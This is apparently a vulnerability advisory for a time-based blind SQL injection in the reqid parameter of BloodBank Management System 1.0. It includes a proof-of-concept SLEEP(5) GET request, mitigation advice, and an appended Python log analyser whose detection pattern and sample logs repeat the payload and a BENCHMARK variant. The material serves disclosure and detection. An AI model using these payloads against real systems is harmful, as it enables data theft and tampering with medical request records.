
@higordiego
Created October 25, 2024 19:43

Affected Version:

  • BloodBank Management System: 1.0

Vulnerability Information:

  • Vulnerability Type: SQL Injection (Time-Based Blind)
  • Severity: HIGH
  • Status: Unpatched

Vulnerable Endpoint:

  • /file/accept.php?reqid=3

Vulnerability Description:

A SQL Injection vulnerability has been identified in the BloodBank Management System version 1.0, specifically within the reject request functionality. This flaw occurs due to insufficient input validation on the reqid parameter, allowing an attacker to inject malicious SQL code into the query responsible for processing request rejections.

This issue can be exploited as a time-based blind SQL injection: the injected code makes the database sleep for a chosen number of seconds. No data is returned directly, but an attacker can infer the outcome of each injected query by measuring the delay in the server's response. Exploiting this vulnerability could allow the following malicious actions:

  • Data extraction over time.
  • Tampering with request records, such as canceling or altering blood donation or request statuses.
  • Denial of Service (DoS) attacks, impacting system availability by artificially increasing query times.

Proof of Concept (PoC):

Below is an example of a GET request demonstrating the time-based blind SQL injection. The injected SQL pauses the database for 5 seconds if the statement executes:

GET /file/accept.php?reqid=3'%20AND%20(SELECT%206479%20FROM%20(SELECT(SLEEP(5)))RvgZ)--%20MSPb HTTP/1.1
Host: localhost:8080
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/bloodrequest.php?msg=hospital1%20have%20logged%20in.
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive

In this example, if the query executes successfully, the response from the server will be delayed by 5 seconds, confirming that the system is vulnerable to SQL injection.


Impact:

  • Data Breach: Attackers can gradually extract sensitive records, such as blood requests or donor data.
  • Request Manipulation: Malicious users could alter or reject blood requests, leading to system misuse or mismanagement.
  • Denial of Service (DoS): Repeated exploitation could lead to delayed responses, affecting user experience and system availability.

Mitigation Recommendations:

  1. Use Prepared Statements: Employ parameterized queries to prevent SQL injection attacks.
  2. Input Validation: Properly sanitize and validate user inputs, especially the reqid parameter, to block malicious content.
  3. Restrict Error Messages: Avoid showing detailed SQL errors to end users to minimize attack vectors.
  4. Database Privilege Management: Limit the privileges of the database user to reduce the potential impact of an exploit.
  5. Implement Rate Limiting: Limit the number of requests to prevent exploitation for DoS attacks.
  6. Routine Security Testing: Perform regular penetration tests and code reviews to identify and mitigate vulnerabilities early.
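As an added example (not part of the original report), the detection side of the issue described above: a small log analyser that flags requests to /file/accept.php whose reqid is not a plain integer, contains a time-delay SQL function, or took unusually long to answer. The log lines, IP addresses and the 3-second threshold are constructed for illustration; the log format is Apache combined with a trailing response time in microseconds.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample log lines (Apache combined format plus %D response time in
# microseconds). The second line carries the report's PoC payload; the third uses
# BENCHMARK() as a second delay primitive defenders should watch for.
LOG_LINES = [
    '10.0.0.5 - - [25/Oct/2024:19:40:01 +0000] "GET /file/accept.php?reqid=3 HTTP/1.1" 200 512 41230',
    '10.0.0.9 - - [25/Oct/2024:19:40:07 +0000] "GET /file/accept.php?reqid=3%27%20AND%20(SELECT%206479%20FROM%20(SELECT(SLEEP(5)))RvgZ)--%20MSPb HTTP/1.1" 200 512 5043110',
    '10.0.0.9 - - [25/Oct/2024:19:40:15 +0000] "GET /file/accept.php?reqid=3%20AND%20BENCHMARK(5000000,MD5(1)) HTTP/1.1" 200 512 5210004',
    '10.0.0.7 - - [25/Oct/2024:19:40:20 +0000] "GET /bloodrequest.php?msg=hospital1%20have%20logged%20in. HTTP/1.1" 200 2048 23000',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d+) \S+ (?P<usec>\d+)$'
)
# Delay primitives used by time-based blind injection across common databases.
TIME_FUNCS = re.compile(r'\b(SLEEP|BENCHMARK|WAITFOR|PG_SLEEP)\s*\(', re.IGNORECASE)
SLOW_USEC = 3_000_000  # assumed threshold: accept.php normally answers in tens of ms

def analyse(line):
    """Return a finding dict for an accept.php request, or None if not applicable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m['target'])
    if url.path != '/file/accept.php':
        return None
    # parse_qs percent-decodes, so the raw injected SQL is visible here.
    reqid = parse_qs(url.query).get('reqid', [''])[0]
    reasons = []
    if not reqid.isdigit():
        reasons.append('reqid is not a plain integer')
    if TIME_FUNCS.search(reqid):
        reasons.append('time-delay SQL function in reqid')
    usec = int(m['usec'])
    if usec > SLOW_USEC:
        reasons.append(f'slow response ({usec / 1e6:.1f}s)')
    return {'ip': m['ip'], 'reqid': reqid, 'reasons': reasons}

def suspicious(lines):
    """Keep only accept.php requests that triggered at least one indicator."""
    return [r for r in map(analyse, lines) if r and r['reasons']]

if __name__ == '__main__':
    for finding in suspicious(LOG_LINES):
        print(finding['ip'], '->', '; '.join(finding['reasons']))
```

The same three indicators (non-integer reqid, delay function in the parameter, and response time far above the endpoint's baseline) map directly onto the validation and rate-limiting recommendations above.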